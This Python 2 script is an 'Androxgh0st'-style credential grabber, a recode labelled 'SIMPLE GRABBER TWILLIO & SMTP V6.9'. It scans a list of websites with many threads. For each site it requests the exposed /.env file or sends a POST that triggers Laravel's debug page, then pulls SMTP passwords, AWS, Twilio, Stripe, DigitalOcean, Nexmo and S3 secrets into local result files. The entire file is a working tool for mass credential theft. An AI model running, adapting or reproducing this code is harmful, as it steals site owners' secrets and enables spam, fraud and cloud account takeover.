# -*- coding: utf-8 -*-
import requests, os, sys
from re import findall as reg
requests.packages.urllib3.disable_warnings()
from threading import *
from threading import Thread
from ConfigParser import ConfigParser
from Queue import Queue

try:
	os.mkdir('Result')
except:
	pass

class Worker(Thread):
    def __init__(self, tasks):
        Thread.__init__(self)
        self.tasks = tasks
        self.daemon = True
        self.start()

    def run(self):
        while True:
            func, args, kargs = self.tasks.get()
            try: func(*args, **kargs)
            except Exception, e: print e
            self.tasks.task_done()

class ThreadPool:
    def __init__(self, num_threads):
        self.tasks = Queue(num_threads)
        for _ in range(num_threads): Worker(self.tasks)

    def add_task(self, func, *args, **kargs):
        self.tasks.put((func, args, kargs))

    def wait_completion(self):
        self.tasks.join()

class androxgh0st:
	def get_twillio(self, text, url):
		try:
			if "TWILIO" in text:
				if "TWILIO_ACCOUNT_SID=" in text:
					method = '/.env'
					acc_sid = reg('\nTWILIO_ACCOUNT_SID=(.*?)\n', text)[0]
					acc_key = reg('\nTWILIO_API_KEY=(.*?)\n', text)[0]
					sec = reg('\nTWILIO_API_SECRET=(.*?)\n', text)[0]
					chatid = reg('\nTWILIO_CHAT_SERVICE_SID=(.*?)\n', text)[0]
					phone = reg('\nTWILIO_NUMBER=(.*?)\n', text)[0]
					auhtoken = reg('\nTWILIO_AUTH_TOKEN=(.*?)\n', text)[0]
				elif '<td>TWILIO_ACCOUNT_SID</td>' in text:
					method = 'debug'
					acc_sid = reg('<td>TWILIO_ACCOUNT_SID<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					acc_key = reg('<td>TWILIO_API_KEY<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					sec = reg('<td>TWILIO_API_SECRET<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					chatid = reg('<td>TWILIO_CHAT_SERVICE_SID<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					phone = reg('<td>TWILIO_NUMBER<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					auhtoken = reg('<td>TWILIO_AUTH_TOKEN<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
				elif 'TWILIO_SID' in text:
					method = '/.env'
					acc_sid = reg('\nTWILIO_SID=(.*?)\n', text)[0]
					acc_key = reg('\nTWILIO_API_KEY=(.*?)\n', text)[0]
					sec = reg('\nTWILIO_API_SECRET=(.*?)\n', text)[0]
					chatid = reg('\nTWILIO_CHAT_SERVICE_SID=(.*?)\n', text)[0]
					phone = reg('\nTWILIO_NUMBER=(.*?)\n', text)[0]
					auhtoken = reg('\nTWILIO_AUTH_TOKEN=(.*?)\n', text)[0]	
				elif '<td>TWILIO_SID</td>' in text:
					method = 'debug'
					acc_sid = reg('<td>TWILIO_SID<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					acc_key = reg('<td>TWILIO_API_KEY<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					sec = reg('<td>TWILIO_API_SECRET<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					chatid = reg('<td>TWILIO_CHAT_SERVICE_SID<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					phone = reg('<td>TWILIO_NUMBER<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					auhtoken = reg('<td>TWILIO_AUTH_TOKEN<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
				build = 'URL: '+str(url)+'\nMETHOD: '+str(method)+'\nTWILIO_ACCOUNT_SID: '+str(acc_sid)+'\nTWILIO_API_KEY: '+str(acc_key)+'\nTWILIO_API_SECRET: '+str(sec)+'\nTWILIO_CHAT_SERVICE_SID: '+str(chatid)+'\nTWILIO_NUMBER: '+str(phone)+'\nTWILIO_AUTH_TOKEN: '+str(auhtoken)
				remover = str(build).replace('\r', '')
				save = open('Result/TWILLIO.txt', 'a')
				save.write(remover+'\n\n')
				save.close()
				return True
			else:
				return False
		except:
			return False

	def get_sms(self, text, url):
		try:		
			if "SMS" in text:
				build = 'URL : '+str(url)
				remover = str(build).replace('\r', '')
				save = open('Result/Found_sms.txt', 'a')
				save.write(remover+'\n\n')
				save.close()
				return True
			else:
				return False	
		except:
			return False	
	def get_do(self, text, url):
		try:
			if "DO_SPACES_KEY" in text:
				if "DO_SPACES_KEY=" in text:
					method = '/.env'
					do_key = reg('\nDO_SPACES_KEY=(.*?)\n', text)[0]
					do_sec = reg('\nDO_SPACES_SECRET=(.*?)\n', text)[0]
					do_end = reg('\nDO_SPACES_ENDPOINT=(.*?)\n', text)[0]
					do_reg = reg('\nDO_SPACES_REGION=(.*?)\n', text)[0]
					do_buc = reg('\nDO_SPACES_BUCKET=(.*?)\n', text)[0]
				elif '<td>DO_SPACES_KEY</td>' in text:
					method = 'debug'
					do_key = reg('<td>DO_SPACES_KEY<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					do_sec = reg('<td>DO_SPACES_SECRET<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					do_end = reg('<td>DO_SPACES_ENDPOINT<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					do_reg = reg('<td>DO_SPACES_REGION<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					do_buc = reg('<td>DO_SPACES_BUCKET<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
				build = 'URL: '+str(url)+'\nMETHOD: '+str(method)+'\nDO_SPACES_KEY: '+str(do_key)+'\nDO_SPACES_SECRET: '+str(do_sec)+'\nDO_SPACES_ENDPOINT: '+str(do_end)+'\nDO_SPACES_REGION: '+str(do_reg)+'\nDO_SPACES_BUCKET: '+str(do_buc)
				remover = str(build).replace('\r', '')
				save = open('Result/DO.txt', 'a')
				save.write(remover+'\n\n')
				save.close()
				return True
			else:
				return False
		except:
			return False
	def get_nexmo(self, text, url):
		try:
			if "S3_KEY" in text:
				if "S3_KEY=" in text:
					method = '/.env'
					acc_key = reg('\nS3_KEY=(.*?)\n', text)[0]
					acc_sec = reg('\nS3_SECRET=(.*?)\n', text)[0]
					acc_reg = reg('\nS3_REGION=(.*?)\n', text)[0]
					acc_buc = reg('\nS3_BUCKET=(.*?)\n', text)[0]
				elif '<td>S3_KEY</td>' in text:
					method = 'debug'
					acc_key = reg('<td>S3_KEY<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					acc_sec = reg('<td>S3_SECRET<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					acc_reg = reg('<td>S3_REGION<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]	
					acc_buc = reg('<td>S3_BUCKET<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]	


				build = 'URL: '+str(url)+'\nMETHOD: '+str(method)+'\nS3_KEY: '+str(acc_key)+'\nS3_SECRET: '+str(acc_sec)+'\nS3_REGION: '+str(acc_reg)+'\nS3_BUCKET: '+str(acc_buc)
				remover = str(build).replace('\r', '')
				save = open('Result/AmazonS3.txt', 'a')
				save.write(remover+'\n\n')
				save.close()	

		except:
			return False	
	
	def get_s3_bucket(self, text, url):
		try:
			if "NEXMO" in text:
				if "NEXMO_KEY=" in text:
					method = '/.env'
					acc_key = reg('\nNEXMO_KEY=(.*?)\n', text)[0]
					acc_sec = reg('\nNEXMO_SECRET=(.*?)\n', text)[0]
				elif '<td>NEXMO_KEY</td>' in text:
					method = 'debug'
					acc_key = reg('<td>NEXMO_KEY<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					acc_sec = reg('<td>NEXMO_SECRET<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]	

				build = 'URL: '+str(url)+'\nMETHOD: '+str(method)+'\nNEXMO_KEY: '+str(acc_key)+'\nNEXMO_SECRET: '+str(acc_sec)
				remover = str(build).replace('\r', '')
				save = open('Result/Nexmo.txt', 'a')
				save.write(remover+'\n\n')
				save.close()	

		except:
			return False		

	def get_stripe(self, text, url):
		try:
			if "DO_SPACES_KEY" in text:
				if "DO_SPACES_KEY=" in text:
					method = '/.env'
					stripe_key = reg('\nSTRIPE_KEY=(.*?)\n', text)[0]
					stripe_sec = reg('\nSTRIPE_SECRET=(.*?)\n', text)[0]
				elif '<td>DO_SPACES_KEY</td>' in text:
					method = 'debug'
					stripe_key = reg('<td>STRIPE_KEY<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					stripe_sec = reg('<td>STRIPE_SECRET<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
				build = 'URL: '+str(url)+'\nMETHOD: '+str(method)+'\nSTRIPE_KEY: '+str(stripe_key)+'\nSTRIPE_SECRET: '+str(stripe_sec)
				remover = str(build).replace('\r', '')
				save = open('Result/Stripe.txt', 'a')
				save.write(remover+'\n\n')
				save.close()
				return True
			else:
				return False
		except:
			return False	

	def get_smtp(self, text, url):
		try:
			if "MAIL_HOST" in text:
				if "MAIL_HOST=" in text:
					method = '/.env'
					mailhost = reg("\nMAIL_HOST=(.*?)\n", text)[0]
					mailport = reg("\nMAIL_PORT=(.*?)\n", text)[0]
					mailuser = reg("\nMAIL_USERNAME=(.*?)\n", text)[0]
					mailpass = reg("\nMAIL_PASSWORD=(.*?)\n", text)[0]
					mailfrom = reg("\nMAIL_FROM_ADDRESS=(.*?)\n", text)[0]
					awskey	 = reg("\nAWS_ACCESS_KEY_ID=(.*?)\n", text)[0]
					awssecreet = reg("\nAWS_SECRET_ACCESS_KEY(.*?)\n", text)[0]
					awsregion = reg("\nAWS_DEFAULT_REGION(.*?)\n", text)[0]
				elif "<td>MAIL_HOST</td>" in text:
					method = 'debug'
					mailhost = reg('<td>MAIL_HOST<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					mailport = reg('<td>MAIL_PORT<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					mailuser = reg('<td>MAIL_USERNAME<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					mailpass = reg('<td>MAIL_PASSWORD<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					mailfrom = reg('<td>MAIL_FROM_ADDRESS<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					awskey   = reg('<td>AWS_ACCESS_KEY_ID<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					awssecreet = reg('<td>AWS_SECRET_ACCESS_KEY<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
					awsregion = reg('<td>AWS_DEFAULT_REGION<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
				if mailuser == "null" or mailpass == "null" or mailfrom == "null" or mailuser == "" or mailpass == "" or mailfrom == "":
					return False
				else:
					# mod aws
					if '.amazonaws.com' in mailhost:
						getcountry = reg('email-smtp.(.*?).amazonaws.com', mailhost)[0]
						build = 'URL: '+str(url)+'\nMETHOD: '+str(method)+'\nMAILHOST: '+str(mailhost)+'\nAWS_ACCESS_KEY_ID: '+str(awskey)+'\nAWS_SECRET_ACCESS_KEY: '+str(awssecreet)+'\nAWS_DEFAULT_REGION: '+str(awsregion)
						remover = str(build).replace('\r', '')
						save = open('Result/AWS'+awsregion+'.txt', 'a')
						save.write(remover+'\n\n')
						save.close()

					if '.amazonaws.com' in mailhost:
						getcountry = reg('email-smtp.(.*?).amazonaws.com', mailhost)[0]
						build = 'URL: '+str(url)+'\nMETHOD: '+str(method)+'\nMAILHOST: '+str(mailhost)+'\nMAIL_USERNAME: '+str(mailuser)+'\nMAIL_PASSWORD: '+str(mailpass)+'\nAWS_DEFAULT_REGION: '+str(awsregion)+'\nMAIL_FROM_ADDRESS: '+str(mailfrom)
						remover = str(build).replace('\r', '')
						save = open('Result/SES'+awsregion+'.txt', 'a')
						save.write(remover+'\n\n')
						save.close()

					else:
						build = 'URL: '+str(url)+'\nMETHOD: '+str(method)+'\nMAILHOST: '+str(mailhost)+'\nMAILPORT: '+str(mailport)+'\nMAILUSER: '+str(mailuser)+'\nMAILPASS: '+str(mailpass)+'\nMAILFROM: '+str(mailfrom)
						remover = str(build).replace('\r', '')
						save = open('Result/SMTP_RANDOM.txt', 'a')
						save.write(remover+'\n\n')
						save.close()
					return True
			else:
				return False
		except Exception as err:
			print(str(err))
			return False

def printf(text):
    ''.join([str(item) for item in text])
    print(text + '\n'),

def main(url):
	resp = False
	try:
		text = '\033[32;1m#\033[0m '+url
		headers = {'User-agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36'}
		get_source = requests.get(url+"/.env", headers=headers, timeout=8, verify=False, allow_redirects=False).text
		if "APP_KEY=" in get_source:
			resp = get_source
		else:
			get_source = requests.post(url, data={"0x[]":"androxgh0st"}, headers=headers, timeout=8, verify=False, allow_redirects=False).text
			if "<td>APP_KEY</td>" in get_source:
				resp = get_source
		if resp:
			getsmtp = androxgh0st().get_smtp(resp, url)
			getwtilio = androxgh0st().get_twillio(resp, url)
			getDo = androxgh0st().get_do(resp, url)
			getStripe = androxgh0st().get_stripe(resp, url)
			getSms = androxgh0st().get_sms(resp, url)
			getNexmo = androxgh0st().get_nexmo(resp, url)

			if getsmtp:
				text += ' | \033[32;1mSMTP\033[0m'
			else:
				text += ' | \033[31;1mSMTP\033[0m'
			if getwtilio:
				text += ' | \033[32;1mTWILIO\033[0m'
			else:
				text += ' | \033[31;1mTWILIO\033[0m'
			if getDo:
				text += ' | \033[32;1mDO_KEY\033[0m'
			else:
				text += ' | \033[31;1mDO_KEY\033[0m'
			if getStripe:
				text += ' | \033[32;1mStripe\033[0m'	
			else:
				text += ' | \033[31;1mStripe\033[0m'
			if getSms:
				text += ' | \033[32;1mSMS Found\033[0m'	
			else:
				text += ' | \033[31;1mSMS Found\033[0m'
			if getNexmo:
				text += ' | \033[32;1mNexmo\033[0m'	
			else:
				text += ' | \033[31;1mNexmo\033[0m'		
	except:
		text = '\033[31;1m#\033[0m '+url
	printf(text)


if __name__ == '__main__':
    print('''
______________________________________________________________________________________________________________


 /$$   /$$  /$$$$$$  /$$      /$$ /$$$$$$$$ /$$   /$$        /$$$$$$   /$$$$$$  /$$$$$$$  /$$$$$$$$ /$$$$$$$ 
| $$  /$$/ /$$__  $$| $$$    /$$$| $$_____/| $$$ | $$       /$$__  $$ /$$__  $$| $$__  $$| $$_____/| $$__  $$
| $$ /$$/ | $$  \ $$| $$$$  /$$$$| $$      | $$$$| $$      | $$  \__/| $$  \ $$| $$  \ $$| $$      | $$  \ $$
| $$$$$/  | $$$$$$$$| $$ $$/$$ $$| $$$$$   | $$ $$ $$      | $$      | $$  | $$| $$  | $$| $$$$$   | $$$$$$$/
| $$  $$  | $$__  $$| $$  $$$| $$| $$__/   | $$  $$$$      | $$      | $$  | $$| $$  | $$| $$__/   | $$__  $$
| $$\  $$ | $$  | $$| $$\  $ | $$| $$      | $$\  $$$      | $$    $$| $$  | $$| $$  | $$| $$      | $$  \ $$
| $$ \  $$| $$  | $$| $$ \/  | $$| $$$$$$$$| $$ \  $$      |  $$$$$$/|  $$$$$$/| $$$$$$$/| $$$$$$$$| $$  | $$
|__/  \__/|__/  |__/|__/     |__/|________/|__/  \__/       \______/  \______/ |_______/ |________/|__/  |__/
                                                                                                             
                                                                                                             
                                                                                                             
_____________SIMPLE GRABBER TWILLIO & SMTP \033[32;1m\033[0m V6.9___Recode_Kamen-Coder_______________________       \n''')
    try:
        readcfg = ConfigParser()
        readcfg.read(pid_restore)
        lists = readcfg.get('DB', 'FILES')
        numthread = readcfg.get('DB', 'THREAD')
        sessi = readcfg.get('DB', 'SESSION')
        print("log session bot found! restore session")
        print('''Using Configuration :\n\tFILES='''+lists+'''\n\tTHREAD='''+numthread+'''\n\tSESSION='''+sessi)
        tanya = raw_input("Want to contineu session ? [Y/n] ")
        if "Y" in tanya or "y" in tanya:
            lerr = open(lists).read().split("\n"+sessi)[1]
            readsplit = lerr.splitlines()
        else:
            kntl # Send Error Biar Lanjut Ke Wxception :v
    except:
        try:
            lists = sys.argv[1]
            numthread = sys.argv[2]
            readsplit = open(lists).read().splitlines()
        except:
            try:
                lists = raw_input("websitelist ? ")
                readsplit = open(lists).read().splitlines()
            except:
                print("Wrong input or list not found!")
                exit()
            try:
                numthread = raw_input("threads ? ")
            except:
                print("Wrong thread number!")
                exit()
    pool = ThreadPool(int(numthread))
    for url in readsplit:
        if "://" in url:
            url = url
        else:
            url = "http://"+url
        if url.endswith('/'):
            url = url[:-1]
        jagases = url
        try:
            pool.add_task(main, url)
        except KeyboardInterrupt:
            session = open(pid_restore, 'w')
            cfgsession = "[DB]\nFILES="+lists+"\nTHREAD="+str(numthread)+"\nSESSION="+jagases+"\n"
            session.write(cfgsession)
            session.close()
            print("CTRL+C Detect, Session saved")
            exit()
    pool.wait_completion()
    try:
        os.remove(pid_restore)
    except:
        pass